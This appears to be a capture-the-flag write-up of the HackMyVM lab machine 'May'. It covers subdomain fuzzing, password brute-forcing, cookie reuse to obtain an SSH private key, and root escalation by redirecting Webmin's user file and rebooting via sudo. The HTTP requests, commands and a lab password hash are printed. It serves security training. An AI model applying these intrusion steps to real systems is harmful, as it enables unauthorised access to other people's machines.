This is May . It’s Medium rated.
Ports
SSH, HTTP and Webmin on Port 10000.
HTTP
nmap says:
http-title: Did not follow redirect to http://may.hmv
So I add that to /etc/hosts. I visit the homepage and get this:
admin: Web is under construction. Use Intranet.
marie: Where are now the keys?
alice: Yes, where are?
admin: :’(
So we have three usernames, plus a suggestion of subdomains. Good enough for me:
┌──( root💀kali) -[/opt/hackmyvm/may]
└─# wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://may.hmv" -H "Host: FUZZ.may.hmv" -t 42 --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://may.hmv/
Total requests: 114441
ID Response Lines Word Chars Payload
000000048: 200 11 L 31 W 406 Ch "portal"
000000183: 200 10 L 31 W 405 Ch "ssh"
Total time: 0
Processed Requests: 114441
Filtered Requests: 114439
Requests/sec.: 0
At both ssh.may.hmv and portal.may.hmv we get simple login forms, and all the fuzzing in the world doesn’t find anything else. I try bruteforcing with my usernames, and eventually:
POST /check.php HTTP/1.1
Host: portal.may.hmv
User-Agent: Mozilla/5.0 ( X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml; q = 0.9,image/webp,* /* ; q = 0.8
Accept-Language: en-US,en; q = 0.5
Accept-Encoding: gzip , deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://portal.may.hmv
Connection: close
Referer: http://portal.may.hmv/
Upgrade-Insecure-Requests: 1
user = marie&password= rebelde
prompts this response:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:26:12 GMT
Content-Type: text/html; charset = UTF-8
Connection: close
Set-Cookie: Sweetcookie = HMVHMXHMVHMXHMVHMXHMVHMX
Content-Length: 56
Hi marie!Portal is under development too.Come back later
This was using Burp Turbo Intruder and /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
Now if we try using our cookie at the other subdomain?
POST /check.php HTTP/1.1
Host: ssh.may.hmv
User-Agent: Mozilla/5.0 ( X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml; q = 0.9,image/webp,* /* ; q = 0.8
Accept-Language: en-US,en; q = 0.5
Accept-Encoding: gzip , deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://ssh.may.hmv
Connection: close
Referer: http://ssh.may.hmv/
Upgrade-Insecure-Requests: 1
Cookie: Sweetcookie = HMVHMXHMVHMXHMVHMXHMVHMX
user = marie&password= rebelde
We get this:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:44:08 GMT
Content-Type: text/html; charset = UTF-8
Connection: close
Content-Length: 1823
<pre>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA3HwQ6G67tSrcxTN2oOKplVae0b+gVe0x/btFSgGJy2bMoWc14qBO
jE7cEcO8tEB85mI3ftByjp6ZVcQWdmEFvqDjeiGvucu0cnO/kTYZGue34/P0+3TJ4Dn92l
# etc
l1iMe5oHRwklV/d5eEM/8bTl0MgDEhMYRLkmkuuhOb6rVIz3y3PVmE0zeQa2u6qj0stmLm
34pXoHjrR2KlUk5pvoXbcvm8TvnHypnIwls1QL5WsHMGNjt/AbboqLkA2m+v9IEEIww40w
8fGOoN87zX40QP6lAAAACW1hcmllQG1heQE =
-----END OPENSSH PRIVATE KEY-----
</pre>
Bingo.
┌──( root💀kali) -[/opt/hackmyvm/may]
└─# chmod 600 id_rsa
┌──( root💀kali) -[/opt/hackmyvm/may]
└─# ssh -i id_rsa marie@10.10.10.43
Linux may 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/* /copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 22 03:34:48 2021
marie@may:~$
marie@may:~$ sudo -l
Matching Defaults entries for marie on may:
env_reset, mail_badpass, secure_path = /usr/local/sbin\: /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin
User marie may run the following commands on may:
( ALL) NOPASSWD: /usr/sbin/halt, /usr/sbin/reboot, /usr/sbin/poweroff
marie@may:~$
Interesting, but not immediately useful. I run linpeas and find this:
Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
/etc/webmin/miniserv.conf
Hmmm, I’m pretty sure we shouldn’t have access to that. Documentation is sparse, but in the end I create a file:
marie@may:~$ pwd
/home/marie
marie@may:~$ cat miniserv.users
root:$1$84720675$F08uAAcIMcN8lZNg9D74p1 :::::1584720675:::0::::
This uses the password 123 . That’s the kinda thing an idiot would have on his luggage!
marie@may:~$ cat /etc/webmin/miniserv.conf
port = 10000
root = /usr/share/webmin
# etc
userfile = /home/marie/miniserv.users
keyfile = /etc/webmin/miniserv.pem
passwd_file = /etc/shadow
# etc
We edit /etc/webmin/miniserv.conf as shown above, and use our sudo powers to reboot the server:
sudo -u root /usr/sbin/reboot
Once it reboots, we can login at https://may.hmv:10000 with root:123 and we have access to a root terminal:
[ root@may ~]# id ; hostname ; date
uid = 0( root) gid = 0( root) groups = 0( root)
may
Mon Dec 27 06:29:04 EST 2021
[ root@may ~]# cd /root
[ root@may ~]# ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Jul 22 02:56 .
4.0K drwxr-xr-x 18 root root 4.0K Jul 22 02:54 ..
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 15:01 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 13 Jul 22 02:47 root.txt
[ root@may ~]# cat root.txt
FLAG_GOES_HERE
[ root@may ~]#
Bit of fun this one.